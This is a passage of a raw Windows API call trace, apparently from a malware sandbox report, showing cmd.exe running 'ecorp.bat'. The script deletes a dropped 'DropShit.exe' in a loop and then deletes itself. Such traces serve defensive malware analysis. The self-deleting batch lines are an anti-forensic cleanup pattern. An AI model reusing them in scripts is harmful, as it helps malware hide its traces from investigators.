RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cdc0 [0092.178] GetProcessHeap () returned 0x250000 [0092.178] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f170 [0092.178] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f184) returned 0x251d50 [0092.178] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 1 [0092.179] FindNextFileW (in: hFindFile=0x251d50, lpFindFileData=0x26f184 | out: lpFindFileData=0x26f184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0092.179] GetLastError () returned 0x12 [0092.179] FindClose (in: hFindFile=0x251d50 | out: hFindFile=0x251d50) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdc0 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd50 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a90 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0092.179] GetProcessHeap () returned 0x250000 [0092.179] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a50 | out: hHeap=0x250000) returned 1 [0092.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.179] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.180] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.180] SetConsoleInputExeNameW () returned 0x1 [0092.180] GetConsoleOutputCP () returned 0x1b5 [0092.180] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.180] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.181] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.181] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.181] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.181] GetProcessHeap () returned 0x250000 [0092.181] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.181] GetProcessHeap () returned 0x250000 [0092.181] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.181] GetProcessHeap () returned 0x250000 [0092.181] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.181] GetProcessHeap () returned 0x250000 [0092.181] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.181] GetProcessHeap () returned 0x250000 [0092.181] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.181] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.181] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.181] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0092.181] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0092.181] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.181] GetFileType (hFile=0x5c) returned 0x1 [0092.181] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.181] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.181] GetProcessHeap () returned 0x250000 [0092.181] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.181] GetProcessHeap () returned 0x250000 [0092.181] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x264610 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x264610, Size=0x1e) returned 0x2645e0 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2645e0) returned 0x1e [0092.182] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x264610 [0092.182] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0092.182] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x268a10 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0092.182] GetProcessHeap () returned 0x250000 [0092.182] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0092.182] _tell (_FileHandle=3) returned 66 [0092.182] _close (_FileHandle=3) returned 0 [0092.182] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.183] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.183] GetFileType (hFile=0x7) returned 0x2 [0092.183] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.183] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.183] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.183] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.183] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.183] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.184] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.184] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.184] GetFileType (hFile=0x7) returned 0x2 [0092.184] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.184] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.184] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.184] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.184] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0092.184] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.184] GetFileType (hFile=0x7) returned 0x2 [0092.184] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.184] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.185] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.185] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0092.185] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0092.185] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.185] GetFileType (hFile=0x7) returned 0x2 [0092.185] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.185] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.185] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.185] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0092.186] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.186] GetFileType (hFile=0x7) returned 0x2 [0092.186] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.186] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.186] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.186] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0092.186] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0092.186] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.186] GetFileType (hFile=0x7) returned 0x2 [0092.186] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.186] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.187] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.187] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0092.187] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.187] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.187] GetFileType (hFile=0x7) returned 0x2 [0092.187] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.187] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.187] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.187] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.188] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0092.188] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0092.188] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0xffffffffffffffff [0092.188] GetLastError () returned 0x2 [0092.188] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0092.188] GetLastError () returned 0x6 [0092.188] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.188] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.188] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.188] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.188] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.188] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.189] SetConsoleInputExeNameW () returned 0x1 [0092.189] GetConsoleOutputCP () returned 0x1b5 [0092.189] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.189] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.189] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.189] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.189] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.189] GetProcessHeap () returned 0x250000 [0092.189] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.190] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.190] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.190] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0xf, lpOverlapped=0x0) returned 1 [0092.190] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del ecorp.bat\r\nhit.exe\" goto Repeat\r\n") returned 15 [0092.190] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.190] GetFileType (hFile=0x5c) returned 0x1 [0092.190] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.190] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.190] GetProcessHeap () returned 0x250000 [0092.190] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.190] GetProcessHeap () returned 0x250000 [0092.190] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.190] GetProcessHeap () returned 0x250000 [0092.190] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.190] GetProcessHeap () returned 0x250000 [0092.190] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0092.190] GetProcessHeap () returned 0x250000 [0092.190] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x26) returned 0x2645e0 [0092.190] _tell (_FileHandle=3) returned 81 [0092.190] _close (_FileHandle=3) returned 0 [0092.190] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.190] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.190] GetFileType (hFile=0x7) returned 0x2 [0092.191] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.191] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.191] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.191] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.191] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.191] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.191] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.191] GetFileType (hFile=0x7) returned 0x2 [0092.192] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.192] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.192] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.192] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.192] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.192] GetFileType (hFile=0x7) returned 0x2 [0092.192] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.192] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0092.192] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.192] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0092.193] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" ecorp.bat ") returned 11 [0092.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.193] GetFileType (hFile=0x7) returned 0x2 [0092.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.193] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.193] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0xb) returned 1 [0092.193] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.193] GetFileType (hFile=0x7) returned 0x2 [0092.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.194] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.194] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.194] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0092.194] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0092.194] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0092.194] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.194] GetProcessHeap () returned 0x250000 [0092.194] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c) returned 0x268c10 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268c10, Size=0x26) returned 0x264610 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x264610) returned 0x26 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c) returned 0x268c10 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268c10, Size=0x26) returned 0x278f90 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278f90) returned 0x26 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x278fc0 [0092.195] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x268a10 [0092.195] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.195] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0092.195] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0092.195] GetProcessHeap () returned 0x250000 [0092.195] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 